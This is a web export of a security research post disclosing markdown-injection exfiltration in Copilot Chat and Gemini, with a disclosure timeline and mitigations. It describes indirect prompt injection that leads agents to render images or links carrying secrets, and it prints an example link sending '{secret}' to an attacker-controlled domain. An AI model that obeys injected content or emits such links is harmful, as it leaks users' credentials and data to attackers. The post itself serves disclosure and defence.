{"id":105964,"date":"2025-12-04T18:30:00","date_gmt":"2025-12-04T16:30:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=105964"},"modified":"2026-02-27T20:39:36","modified_gmt":"2026-02-27T18:39:36","slug":"exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","title":{"rendered":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini"},"content":{"rendered":"<style type=\"text\/css\">@import url(\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/styles\/vs2015.min.css\");@font-face{font-family:'Hack';src:url('https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/hack-font\/3.3.0\/web\/fonts\/hack-regular-subset.woff2') format('woff2')}:root{--code-font:'Hack','Menlo','Consolas',monospace !important;--code-bg:#1e1e1e;--code-color:#0c1;--code-dim:#071;--text-color:#121185;--highlight-color:#f8ff91;--highlight-color-alt:#736ca0}article.content{max-width:100% !important;min-width:80% !important;width:99% !important}.wp-block-code code{text-wrap:nowrap !important}figure{margin-top:1.5rem;margin-bottom:1.5rem}p.caption,figcaption{font-size:1rem !important;font-style:italic !important;color:var(--code-dim) !important}p.caption *,figcaption *{font-size:inherit !important}div.callout{max-width:80% !important;padding-top:.5rem;padding-bottom:.5rem;margin-top:1rem;margin-bottom:1rem;display:block;margin-left:10%;border-top:.3rem solid #121185;border-bottom:.3rem solid #121185}div.callout p{font-size:x-large;text-align:left;font-weight:bold}.cxzero-video-include{display:block;max-width:1920px;width:100%;padding-top:1rem;padding-bottom:1rem}.cxzero-video-include video{display:block;padding:.5rem;background-color:var(--code-bg);width:98%;object-fit:cover}pre.wp-block-code,pre.highlighted-code,pre.sourceCode,pre{border:1px solid var(--code-color);width:90%;background-color:var(--code-bg);color:var(--code-color);margin:1em;padding:2em;overflow-x:scroll;font-family:var(--code-font);font-size:10.5pt;line-height:1.1em;text-wrap:nowrap !important;box-shadow:5px 5px 13px 0 var(--code-bg)}* kbd,* code,* tt{font-family:var(--code-font);padding-inline:.5em;color:var(--code-dim);font-size:85%}pre code{color:var(--code-color);font-size:90%}pre.highlighted-code span{font-family:var(--code-font);font-size:10.5pt;color:var(--code-color)}pre.highlighted-code span.comment{font-style:italic;color:var(--code-dim)}pre.highlighted-code span.keyword,pre.highlighted-code span.preproc{font-weight:bold;font-style:oblique}blockquote,blockquote *{font-size:1.375rem !important;font-style:italic !important}blockquote{border-left:.1rem solid;padding-left:1rem}mark,mark *{background-color:var(--highlight-color) !important}mark.ai-content,mark.ai-content *{background-color:var(--highlight-color-alt) !important;color:#fff !important}.cxzero-cve-block{border:1px solid var(--code-color,#0c1);padding:.5rem;p{padding:0;margin:0}span.vulndesc{display:block;font-size:.9rem;font-weight:400;font-style:italic}span.cvss::before{content:\"  \"}span.cvss{background:#fe0}span.cvss.critical{background:#c00;color:#eee}span.cvss.high{background:#ffac1c;color:#0015ff}span.vector::before{content:\"\u25b8\"}span.vector,span.vector *{overflow-wrap:break-word;font-family:var(--code-font);font-size:10pt}.kev{display:block;font-weight:bold}.kev::before{content:\"\u203c\ufe0f\"}}.print-source-info{display:none}@media print{.header,.header *,.article-nav,.article-nav *,.aticle-nav,.aticle-nav *,.section_latest,.section-latest *,footer,footer *,.section-menu-page,.section-menu-page *,.top-menu,.top-menu *,.top-menu__container,.top-menu__container *,.section-zero-article,.section-zero-article *{display:none}@page{margin:13mm !important}.section-aticle-header__image-or-video{max-width:125mm}.print-source-info{display:block;border-left:.2rem solid #000;font-style:italic !important;font-size:85%;padding-left:1rem}}<\/style> <script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/highlight.min.js\" integrity=\"sha512-EBLzUL8XLl+va\/zAsmXwS7Z2B1F9HUHkZwyS\/VKwh3S7T\/U0nF4BaU29EP\/ZSf6zgiIxYAnKLu6bJ8dqpmX5uw==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script> <script>hljs.highlightAll();<\/script> \n\n\n\n<p class=\"print-source-info\"><script>document.write(\"Copyright Checkmarx, all rights reserved. Retrieved \"+new Date().toLocaleDateString()+\" from<br\/>\"+window.location.href);<\/script><noscript>This document copyright Checkmarx, all rights reserved.<\/noscript><\/p>\n\n\n\n<style type=\"text\/css\">blockquote, blockquote * { font-size: 1.375rem !important; font-style: italic !important; } blockquote { border-left: 0.1rem solid; padding-left: 1rem; }<\/style>\n\n\n\n<p>Checkmarx Zero has been exploring AI and agent security, with an increased emphasis on this topic following our discovery of <a href=\"https:\/\/checkmarx.com\/zero-post\/bypassing-ai-agent-defenses-with-lies-in-the-loop\/\">the novel Lies-in-the-Loop attack<\/a> (LITL) which bypasses \u201cHuman-in-the-Loop\u201d (HITL) controls mean to prevent AI agents from running harmful code. During this research, we found several cases of <strong>markdown injection<\/strong> in AI agents, leading to data exfiltration.<\/p>\n\n\n\n<p>Microsoft Copilot Chat and Google Gemini are both vulnerable to this issue, which enables data exfiltration through malicious markdown content that leaks sensitive information via image requests and other rendering behaviors. We suspect most AI agents have similar issues.<\/p>\n\n\n\n<p>Markdown injections can also serve as an amplifier for LITL attacks, a behavior we thoroughly discuss in the <a href=\"https:\/\/checkmarx.com\/zero-post\/turning-ai-safeguards-into-weapons-with-hitl-dialog-forging\/\">LITL attack dedicated blog post<\/a>, which we highly encourage reading if you\u2019re interested in AI agent security.<\/p>\n\n\n\n<p>Today, however, we want to explore markdown injection as a standalone vulnerability in Copilot Chat and Google Gemini, demonstrating independent exploitation techniques and attack vectors (similar to those introduced in the <a href=\"https:\/\/www.aim.security\/aim-labs\/aim-labs-echoleak-blogpost\">Echo Leak<\/a> vulnerability).<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Zero-click data exfiltration vulnerability (aka Echo&nbsp;Leak)<\/h2>\n\n\n\n<p>A zero-click data exfiltration attack is one in which someone steals a data without requiring a legitimate user to take any specific action. The attacker exploits a vulnerability that automatically processes data, so your device leaks data only because it received something from a remote source.<\/p>\n\n\n\n<p>A zero-click data exfiltration can occur, for example, when an agent renders certain <a href=\"https:\/\/en.wikipedia.org\/wiki\/Markdown\">Markdown<\/a> elements, such as images. Under the hood, the AI agent\u2019s renderer sends a request to the remote server to fetch the image, then embeds it directly in the conversation. However, attackers can trick the agent into fetching an image (or requesting any content that the agent can be convinced is likely to be an image) from an attacker-controlled server. The attacker can construct the request so that sensitive information is part of the URL, for example, causing the information to leak onto the attacker\u2019s server.<\/p>\n\n\n\n<p>Here\u2019s a simple demo that shows how to exfiltrate sensitive information (in this case, it\u2019s Claude\u2019s API key; we used an invalidated key for the demo, for safety reasons) from the developer environment into an attacker-controlled webhook:<\/p>\n\n\n\n<div class=\"cxzero-video-include\">\n<video muted controls controlslist=\"nodownload noremoteplayback\">\n<source src=\"\/wp-content\/uploads\/2025\/12\/cxzero-ms-copilot-md-inject-full.mp4\" type=\"video\/mp4\">\n<p><em>Your browser cannot display this video content<\/em><\/p>\n<\/video>\n<p class=\"caption\">Exploiting Markdown Injection to cause Copilot to exfiltrate a Claude API key<\/p>\n<\/div>\n\n\n\n<p>We reported this issue to Microsoft, but they did <strong><em>not <\/em><\/strong>consider it a vulnerability (their response is available at the bottom of this page). This is in line with how agent vendors have generally viewed unsafe behavior of this type: they generally consider it a risk the user accepts, and the use is responsible for managing that risk.<\/p>\n\n\n\n<p>This technique is powerful because it only requires the agent to rely on an attacker-controlled online resource, such as an article. This makes the attack simple to set up. Fortunately for defenders, though, it can be somewhat complex for the attacker to get the agent to consume the malicious resource. Once that happens, though, the indirect prompt injection will tamper with the agent\u2019s output in the chat. This causes the image element to be rendered immediately and leak sensitive information without requiring any further user intervention. Note that in the recorded demo, the image isn\u2019t rendered as a visual element; however, the GET request is still sent to the webhook.<\/p>\n\n\n\n<p>This is how injecting image elements via Markdown injection in AI agents can facilitate zero-click data exfiltration. Mitigating this risk typically involves either stripping or blocking image elements in the Markdown renderer.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">One-click data exfiltration<\/h2>\n\n\n\n<p>The widely discussed zero-click data exfiltration is not the end of the story. It\u2019s possible to trigger one-click data exfiltration with simple links.<\/p>\n\n\n\n<p>Take this markdown link for example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>&#91;click here](https:\/\/attacker-controlled-domain.com?sensitiveInfo=<\/code>{<code>secret})<\/code><\/code><\/pre>\n\n\n\n<p>Where <code>{secret}<\/code> is replaced with the actual value of the sensitive information, as shown in the Microsoft Copilot Chat zero-click demo above.<\/p>\n\n\n\n<p>Given that Microsoft didn\u2019t commit to fixing the issue of zero-click data exfiltration because it wasn\u2019t considered a vulnerability, we don\u2019t expect the one-click data exfiltration variant will be fixed either.<br>However, Google Gemini prevents zero-click data exfiltration (like EchoLeak) by blocking Markdown image tags using a dedicated sanitizer:<\/p>\n\n\n\n<blockquote>\n<p>Our markdown sanitizer identifies external image URLs and will not render them, making the \u201cEchoLeak\u201d 0-click image rendering exfiltration <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2025-32711\">vulnerability<\/a> not applicable to Gemini.<\/p>\n<p class=\"caption\"><a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">Reference: Mitigating prompt injection attacks with a layered defense strategy<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>Diving deeper into Google\u2019s philosophy and <a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">security strategy for mitigating prompt injection attacks<\/a> reveals that while they reduce certain risks, this solution remains incomplete. They don\u2019t prevent one-click data exfiltration attacks. We reported the issue to their security team, who responded with \u201cfix is not feasible\u201d. This is an acceptable answer; but it means users should be warned about this risk, since this position puts it in their hands to manage.<\/p>\n\n\n\n<p>Google\u2019s strategy involves removing known malicious URLs and other suspicious links from Gemini responses, reducing phishing and malicious link risks in general. They do so thanks to the <a href=\"https:\/\/safebrowsing.google.com\/\">Google Safe Browsing project<\/a>; however, these links must be recognized as malicious in advance, before they can be removed\u200a, meaning new threats are not automatically flagged. Attackers can set up their own <strong><em>new <\/em><\/strong>domain (i.e., one not yet known to the Google Safe Browsing Project) and exploit markdown links to exfiltrate data, rather than the restricted image elements.<\/p>\n\n\n\n<p>Combine this with social engineering and redirects, and clicking such links could easily lead to unnoticed data exposure. This attack pathway is not unique to AI agents, of course, but the layer of indirection provided by an attacker getting an AI agent to participate in the attack is a novel advantage for the attacker.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">Impact<\/h2>\n\n\n\n<p>Data exfiltration through prompt injections, including markdown injection, in AI agents can lead to severe consequences. Anything that ranges from source code disclosure to leaking secrets can not only result in a complete compromise of the remote machine but also pave the way for an attacker to escalate their privileges horizontally or vertically. Ultimately, data leaks can have serious consequences for organizations regardless of the pathway through which the data escapes. Yet the rapid adoption of AI agents in particular has created blind spots to this type of threat, which security organizations must become aware of and act to control.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Mitigations<\/h2>\n\n\n\n<p>Besides Markdown sanitization, the obvious measure in this context (though perhaps not as obvious, given that Microsoft completely ignores it) is to ensure that when the agent runs on the web, it not only sanitizes Markdown\/HTML but also enforces strict CSP (Content Security Policy), particularly for resources like images, CSS styles, and so on that attackers find easiest to exploit.<\/p>\n\n\n\n<p>In the context of suggested mitigations, it is worth highlighting how Google handles Markdown and suspicious links. We highly recommend reading Google\u2019s full article \u201c<a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">Mitigating prompt injection attacks with a layered defense strategy.<\/a>\u201d<\/p>\n\n\n\n<p>However, remember that even though Gemini identifies &amp; restricts external image URLs as a defensive measure against zero-click data exfiltration, it does not eliminate the one-click data exfiltration risks via external URIs in the links it shares.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-5\">Wrapping Up<\/h2>\n\n\n\n<p>Markdown injection in AI agents has been recognized for some time as a risk. Nevertheless, these vulnerabilities still find their way into very popular products, such as Copilot Chat. As always with security, when new technologies emerge, it takes time for the industry to catch up\u200a\u2014\u200aespecially in this rapidly exploding area of AI, where both usage and attack surface are expanding simultaneously. But that\u2019s exactly what should make us, as security professionals, the ones who keep an eye on the door.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-6\">Disclosure timeline<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ExploitingMarkdownInjectioninMicrosoftCopilotChat&amp;GoogleGemini-Google\">Google<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First Disclosure 05 Oct 2025<\/li>\n\n\n\n<li>Google closed the issue with status <code>Won't Fix (Infeasible)<\/code> &#8211; 09 Oct 2025<\/li>\n\n\n\n<li>Google&#8217;s final response below<\/li>\n<\/ul>\n\n\n\n<blockquote>\n<p>Hi! We&#8217;ve decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.<\/p>\n\n<p>Regarding VRP, we feel that the submission falls outside of the intended program scope, since we require submissions to demonstrate technical security vulnerabilities with a sufficient severity. For example, Google VRP covers only submissions that &#8220;substantially affect the confidentiality or integrity of user data&#8221;.<\/p>\n\n<p>To provide feedback on our products, you can use our Google Product Forums, where you can share your feedback with other users and our product team. That said \u2013 if you think we misunderstood your report, and you see a well-defined security risk, please let us know what we missed.<\/p>\n\n<p>Thanks again for your report and time,<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">Microsoft<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Report was submitted &#8211; 15 Oct 2025<\/li>\n\n\n\n<li>Microsoft acknowledges the report &#8211; 15 Oct 2025<\/li>\n\n\n\n<li>Microsoft notified us that the engineering team is still working on the issue &#8211; 28 Oct 2025<\/li>\n\n\n\n<li>Microsoft marks the report as Completed without fixing the issue 04 Nov 2025<\/li>\n<\/ul>\n\n\n\n<blockquote>\n<p>MSRC&nbsp;&nbsp;&nbsp; <small>Nov 4, 2025, 7:48 PM<\/small><\/p>\n\n<p>Dear Ori,<\/p>\n\n<p>Thank you for your submission and for continuing to engage with MSRC.<\/p>\n\n<p>After careful review, we&#8217;ve determined that the behavior demonstrated does not meet our classification for a security vulnerability. It requires multiple non-default user actions, does not reliably reproduce across environments, and includes warnings designed to mitigate risk.<\/p>\n\n<p>Our assessment also considers the role of Workplace Trust, which assumes users operate in environments where they review and trust the code they choose to run. This principle is reflected in Microsoft&#8217;s AI Vulnerability Severity Classification, which evaluates both impact and exploitability.<\/p>\n\n<p>That said, we agree this is a thoughtful observation. While not classified as a vulnerability, we&#8217;ve shared it with the engineering team to explore ways we can make this behavior more transparent to users.<\/p>\n\n<p>We appreciate your efforts to highlight potential concerns and welcome future submissions that demonstrate broader impact or bypass existing safeguards.<\/p>\n\n<p>Sincerely,\nJustin<\/p>\n\n<p>Microsoft Security Response Center<\/p>\n<\/blockquote>\n\n\n\n<style type=\"text\/css\">.cxzero-social{margin-top:1em;padding-top:1em;border-top:1px solid #121086;border-bottom:1px solid #121086;padding-bottom:1em}.cxzero-social p{padding-top:.8em}.cxzero-social .cxzero-social-links{margin-left:.8em}.cxzero-social .social-link{margin-left:.6em}.cxzero-social .social-button{padding:.6em;margin:.2em .2em .2em .2em;white-space:nowrap}.cxzero-social .social-button svg,.cxzero-social .social-link svg{vertical-align:middle;height:1.3em}.cxzero-social .social-button a,.cxzero-social .social-link a{text-decoration:none !important}<\/style> <div class=\"cxzero-social\">\n<p> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/www.linkedin.com\/sharing\/share-offsite\/?url={url}\" onload=\"\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"LinkedIn Icon\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> Share on LinkedIn<\/a><\/span> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/bsky.app\/intent\/compose?text=I%20just%20read%20%22{title}%22%20from%20Checkmarx%20Zero%20{url}\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Bluesky Icon\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> Share on Bluesky<\/a><\/span> <\/p>\n<p class=\"cxzero-social-links\">Follow <a href=\"\/zero\/\">Checkmarx Zero<\/a>: <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/www.linkedin.com\/showcase\/checkmarx-zero\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"Checkmarx Zero on LinkedIn\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-icon\" href=\"https:\/\/bsky.app\/profile\/checkmarxzero.bsky.social\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Checkmarx Zero on Bluesky\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/x.com\/CheckmarxZero\"><svg alt=\"Checkmarx Zero on X\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewbox=\"0 0 512 462.799\"><path fill-rule=\"nonzero\" d=\"M403.229 0h78.506L310.219 196.04 512 462.799H354.002L230.261 301.007 88.669 462.799h-78.56l183.455-209.683L0 0h161.999l111.856 147.88L403.229 0zm-27.556 415.805h43.505L138.363 44.527h-46.68l283.99 371.278z\"><\/path><\/svg> <\/a><\/span> <\/p> <script>function social_action_template(a){const b=encodeURIComponent(window.location.href);const c=document.querySelector(\"h1\");let headContent=(c==null?\"\":c.textContent);let processed=a.replace(\/\\{title\\}\/g,encodeURIComponent(headContent));processed=processed.replace(\/\\{url\\}\/g,b);return processed}var socialAction=document.getElementsByClassName(\"social-action\");console.log(socialAction);for(e=0;e<socialAction.length;e++){element=socialAction.item(e);console.log(element);element.href=social_action_template(element.href)};<\/script> <\/div>","protected":false},"excerpt":{"rendered":"<p>AI agents provide only very thin defenses against malicious behavior. Popular AI agents such as Microsoft&#8217;s Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate it.<\/p>\n","protected":false},"author":121,"featured_media":105970,"template":"","zero-category":[1067,1176,1179,1104],"zero-tag":[1097,1408,1069,1068,1464,1071],"class_list":["post-105964","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-security-blogs","zero-category-security-trends","zero-category-technical-blog","zero-tag-ai","zero-tag-ai-agent","zero-tag-appsec","zero-tag-checkmarx-security-research-team","zero-tag-markdown","zero-tag-supply-chain-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx\" \/>\n<meta property=\"og:description\" content=\"AI agents provide only very thin defenses against malicious behavior. Popular AI agents such as Microsoft&#039;s Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate it.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-27T18:39:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\",\"name\":\"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"datePublished\":\"2025-12-04T16:30:00+00:00\",\"dateModified\":\"2026-02-27T18:39:36+00:00\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"width\":2560,\"height\":1280,\"caption\":\"Street-art-style cyberpunk illustration of two AI chatbot figures with headset silhouettes flanking a computer monitor as a syringe injects code into the screen; neon green, black, purple, and red accents on a gritty graffiti background suggest \u2018markdown injection\u2019 attacks against AI systems\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","og_locale":"en_US","og_type":"article","og_title":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","og_description":"AI agents provide only very thin defenses against malicious behavior. Popular AI agents such as Microsoft's Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate 